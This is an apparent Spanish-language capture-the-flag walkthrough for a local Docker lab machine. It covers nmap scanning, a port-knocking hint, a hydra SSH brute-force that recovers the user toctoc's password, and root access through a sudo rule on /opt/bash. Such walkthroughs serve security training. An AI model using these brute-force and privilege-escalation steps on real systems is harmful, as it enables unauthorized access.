Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unziplos40ladrones.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shlos40ladrones.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap-p---open-sS--min-rate5000-vvv-n-Pn<IP>
nmap-sCV-p<PORTS><IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:18 EST
Nmap scan report for express.dl (172.17.0.2)
Host is up (0.000031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
Vemos una web de apache2 normal, por lo que vamos a realizar un poco de fuzzing:
Vemos un archivo interesante llamado /qdefense.txt que si entramos dentro de el veremos lo siguiente:
Escalate user toctoc
Recuerda llama antes de entrar , no seas como toctoc el maleducado
7000 8000 9000
busca y llama +54 2933574639
Vemos que tenemos que hacer un portknocking de la siguiente forma en nuestro host:
knock<IP>700080009000
Ahora si nosotros enumeramos que puertos estan abiertos de nuevo:
nmap-p---open-sS--min-rate5000-vvv-n-Pn<IP>
Info:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:52 EST
Initiating ARP Ping Scan at 11:52
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:52, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:52
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:53, 26.37s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000063s latency).
Scanned at 2025-01-17 11:52:34 EST for 27s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.55 seconds
Raw packets sent: 131090 (5.768MB) | Rcvd: 24 (1.040KB)
Vemos que se nos ha abierto el puerto SSH por lo que vamos a probar a poner como usuario toctoc ya que parece que se refiere a el como un usuario y tirarle fuerza bruta con hydra:
Hydra
hydra-ltoctoc-P<WORDLIST>ssh://<IP>-t64
Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-17 11:54:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[STATUS] 323.00 tries/min, 323 tries in 00:01h, 14344106 to do in 740:09h, 34 active
[STATUS] 264.67 tries/min, 794 tries in 00:03h, 14343635 to do in 903:16h, 34 active
[22][ssh] host: 172.17.0.2 login: toctoc password: kittycat
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 28 final worker threads did not complete until end.
[ERROR] 28 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-17 11:58:17
Vemos que hemos encontrados las credenciales del usuario toctoc por lo que nos conectaremos a el.
SSH
sshtoctoc@<IP>
Metemos como contraseña kittycat y veremos que estamos dentro como dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos los siguiente:
Matching Defaults entries for toctoc on f120d0baef4d:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User toctoc may run the following commands on f120d0baef4d:
(ALL : NOPASSWD) /opt/bash
(ALL : NOPASSWD) /ahora/noesta/function
Vemos que podemos ejecutare el binario /opt/bash como el usuario root, por lo que haremos lo siguiente:
sudo/opt/bash
Si ejecutamos eso veremos que somos root, por lo que ya la habremso termiando.
